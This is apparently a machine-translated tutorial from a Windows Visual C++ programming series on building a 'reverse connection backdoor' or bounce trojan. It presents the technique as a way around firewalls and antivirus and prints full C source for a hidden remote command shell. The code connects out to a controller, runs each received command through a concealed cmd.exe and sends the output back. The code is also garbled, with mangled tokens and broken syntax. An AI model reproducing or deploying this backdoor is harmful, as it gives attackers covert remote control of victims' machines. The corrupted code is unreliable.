Analysis of core programming code of Windows Based on Visual C ++ (41) implement reverse connection Backdoor

 

With the emergence of security events, people are increasingly aware of host protection. Various firewalls and anti-virus software are beginning to monitor network connections from outside, therefore, the traditional Trojan Horse with positive connection no longer adapts to the current network environment. In order to continue remote control, the trojan had to be changed from the system, which led to the adoption of reverse connection technology. A bounce Trojan. The trojan "bounce" has seen a lot now, but there are still few articles about its technical details. In order to monitor espionage that harms our great motherland, we need to implement reverse link backdoors.
In essence, reverse connections and forward connections are not very different. In the case of a forward connection, the server side, that is, the controlled side, adopts the server-side Programming Method in programming implementation; while the control side, the client programming method is used in programming implementation. When we adopt the rebound method for programming, we actually turn the controlled end into a client-side programming method, and the control end into a server-side programming method (socket: I don't know. Can readers understand this? I think the cloud is in the fog ). Let's explain it through a simple programming example, so that no one is allowed. Although the examples below are relatively small, they are representative. Readers can learn how to implement the reverse connection technology. At the same time, readers who are not familiar with network programming are also an opportunity to promote learning. You can use this example to familiarize yourself with network programming.
Taking reverse join as an example, let's take a look at the control end's programming implementation method.

 

 

 

# Include <winsock2.h> # include <stdio. h> # pragma comment (Lib, "ws2_32.lib") void main (INT argc, char ** argv) {char * messages = "\ r \ n ================== backconnect backdoor v0.1 ==== ===================================\ r \ n ========== welcome to http: // www.hackerxfiles.net =========\ r \ n "; wsadata; socket sock; sockaddr_in addr_in; char buf1 [1024]; // use memset (buf1,) as the buffer for receiving data from the socket; // clear the buffer if (wsastartup (makewo Rd (2, 0), & wsadata )! = 0) {printf ("wsastartup error. error: d \ n ", wsagetlasterror (); return;} addr_in.sin_family = af_inet; addr_in.sin_port = htons (80 ); // The remote host port of the reverse connection protocol = inet_addr ("127.0.0.1"); // The remote IP address if (sock = socket (af_inet, sock_stream, ipproto_tcp) = invalid_socket) {printf ("socket failed. error: d \ n ", wsagetlasterror (); return;} If (wsaconnect (sock, (struct sockaddr *) & addr_in, sizeof (addr_in), NUL L, null) = socket_error) // connect to the client host {printf ("Connect failed. error: D ", wsagetlasterror (); return;} If (send (sock, messages, strlen (messages), 0) = socket_error) // send the Welcome Message {printf ("Send failed. error: d \ n ", wsagetlasterror (); return;} Char buffer [2048] = {0}; // The data output by the pipeline for (char limit line [270]; memset (pipeline line, 0, sizeof (pipeline line) {security_attributes SA; // create an anonymous pipeline to obtain the command output handle hread, hwrite; SA. nlength = Sizeof (security_attributes); SA. lpsecuritydescriptor = NULL; SA. binherithandle = true; If (! Createpipe (& hread, & hwrite, & SA, 0) {printf ("error on createpipe ()"); return;} startupinfo Si; process_information PI; SI. CB = sizeof (startupinfo); getstartupinfo (& Si); SI. hstderror = hwrite; SI. hstdoutput = hwrite; SI. wshowwindow = sw_hide; SI. dwflags = startf_useshowwindow | startf_usestdhandles; getsystemdirectory (cmdline, max_path + 1); strcat (cmdline, "\ cmd.exe/C"); int Len = Recv (sock, buf1, 1024, null); If (L En = socket_error) Exit (0); // if the client is disconnected, the program automatically exits if (LEN <= 1) {send (sock, "error \ n ", sizeof ("error \ n"), 0); continue;} strncat (queue line, buf1, strlen (buf1); // copy the command parameters to queue lineif (! CreateProcess (null, cmdline, null, null, true, null, & Si, & PI) {send (sock, "error command \ n ", sizeof ("error command \ n"), 0); continue;} closehandle (hwrite); // read and send data in the pipeline cyclically, for (DWORD bytesread; readfile (hread, buffer, 2048, & bytesread, null); memset (buffer,) {send (sock, buffer, strlen (buffer), 0 );}}}